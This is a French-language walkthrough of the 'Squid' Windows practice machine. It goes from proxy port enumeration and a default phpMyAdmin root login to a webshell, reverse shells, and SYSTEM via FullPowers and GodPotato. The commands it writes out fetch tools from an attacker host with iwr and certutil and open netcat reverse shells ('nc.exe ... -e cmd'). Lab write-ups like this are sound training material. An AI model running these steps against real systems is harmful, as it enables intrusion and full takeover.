# Squid

`squid` `proxy` `phpmyadmin` `nt authority\local service`

* Nom machine : Squid
* Difficulté : Easy
* OS : Windows

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-27 04:59 EDT
Nmap scan report for 192.168.248.189
Host is up (0.034s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3128/tcp  open  http-proxy    Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### SMB (139/445)

```
┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.248.189                   
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED
```

Aucun accès

### HTTP-Proxy (3128) : Squid http proxy 4.14

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FtgpAxNjDBTUjlVHSba8Y%2Feaf82c5580460ae1f9179ec729ccb707.png?alt=media&#x26;token=052bc9aa-27f0-4a29-b27a-9cc4f570e4c8" alt=""><figcaption></figcaption></figure>

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid>" %}

#### Configurer le proxy

**FoxyProxy**

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FRrKhejEZgA6tei7Acv3c%2F007fd17c8140f5eaa2b2e5317eb0b161.png?alt=media&#x26;token=037c9503-7b8b-4fb1-897c-938f0c1eba54" alt=""><figcaption></figcaption></figure>

#### Enumérer les ports

Attention : nmap (avec proxychains) ne fonctionne pas ici, il faut utiliser spose.py.

{% embed url="<https://github.com/aancw/spose>" %}

```
┌──(kali㉿kali)-[~]
└─$ git clone https://github.com/aancw/spose.git     
Cloning into 'spose'...
remote: Enumerating objects: 11, done.
remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11
Receiving objects: 100% (11/11), done.

┌──(kali㉿kali)-[~]
└─$ cd spose

┌──(kali㉿kali)-[~/spose]
└─$ python spose.py --proxy http://192.168.248.189:3128 --target 192.168.248.189
Using proxy address http://192.168.248.189:3128
192.168.248.189 3306 seems OPEN 
192.168.248.189 8080 seems OPEN 
```

### HTTP (8080) : Wampserver 3.2.3

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FKy6Qtz2e9iBrAB4M2JKG%2Fd44e94c80eff89ed390f9bb6ca76b248.png?alt=media&#x26;token=90eeaf7b-a6e0-42b9-ba44-4193a58f1714" alt=""><figcaption></figcaption></figure>

Nous allons aller sur la pahe phpmyadmin

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2Fm4mOVSPcizHNtDqsqVXH%2F86b5253d14bdaed7fd5253a61d760040.png?alt=media&#x26;token=b1eeaa06-23d4-497b-9169-e23da56d502e" alt=""><figcaption></figcaption></figure>

Une rapide recherche google nous indique que le nom d'utilisateur par défault est root.

Cela fonctionne !

## Accès initial

### phpMyAdmin

Nous avons créer une base de données : reverse. Ensuite nous avons formulé une requête SQL.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2Fbb0RxMA9KNMdmlfonLtK%2Fead414454380080b19ea32c0dbb3402a.png?alt=media&#x26;token=f0fb84cc-6828-43f8-ae4b-ebef12836286" alt=""><figcaption></figcaption></figure>

En visitant le lien <http://192.168.248.189:8080/reverse.php>, nous arrivons bien au fichier uploader.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FS4tum17g27D7fQfmXREy%2F6200e0ff5e09d985069cb29ba4a7cb1a.png?alt=media&#x26;token=063c08de-df56-4bc2-b8d6-ad50f432e128" alt=""><figcaption></figcaption></figure>

Nous pouvant maintenant chercher à obtenir un reverse shell.

{% embed url="<https://www.revshells.com/>" %}

Powershell base64 (encodé URL) fonctionne.

```
┌──(kali㉿kali)-[~/spose]
└─$ nc -lnvp 1234 
listening on [any] 1234 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50089
whoami
nt authority\local service
```

Le local.txt se trouve à C:\local.txt

## Elévation des privilèges

### nt authority\local service

{% embed url="<https://itm4n.github.io/localservice-privileges/>" %}

{% embed url="<https://github.com/itm4n/FullPowers>" %}

Nous avons téléchargé le fichier .exe FullPowers.exe sur notre kali, lancer un server python puis l'avons ajouté sur notre machine cible. Nous avons également ajouté nc.exe.

Nous avons exécuté l'exploit et lancer un listener.

```
┌──(kali㉿kali)-[~]
└─$ python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.248.189 - - [27/Jul/2024 06:31:23] "GET /Tools/FullPowers.exe HTTP/1.1" 200 -
```

```
PS C:\wamp\www> iwr -uri http://192.168.45.158:80/Tools/FullPowers.exe -Outfile FullPowers.exe
PS C:\wamp\www> ./FullPowers.exe -c "nc.exe 192.168.45.158 1235 -e cmd"
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235 
listening on [any] 1235 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50093
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\local service

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
```

"SeImpersonatePrivilege" Nous pouvons l'exploiter

### SeImpersonatePrivilege

{% embed url="<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer>" %}

```
C:\Windows\system32>cd /wamp/www
C:\wamp\www>certutil -f -urlcache http://192.168.45.158:80/Tools/GodPotato.exe

C:\wamp\www>god.exe -cmd "nc.exe 192.168.45.158 1236 -e cmd"
god.exe -cmd "nc.exe 192.168.45.158 1236 -e cmd"
[*] CombaseModule: 0x140733990830080
[*] DispatchTable: 0x140733993143488
[*] UseProtseqFunction: 0x140733992520752
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\d5fdf30f-3e3c-4561-8f94-c3ed68b3416c\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000bc02-0020-ffff-2bec-e3f4dd11ef72
[*] DCOM obj OXID: 0x1ba1d069c31f35a5
[*] DCOM obj OID: 0x638f6af33d820e90
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 876 Token:0x804  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1528
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1236 
listening on [any] 1236 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50107
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\wamp\www>whoami
whoami
nt authority\system
```

Nous sommes nt authority\system !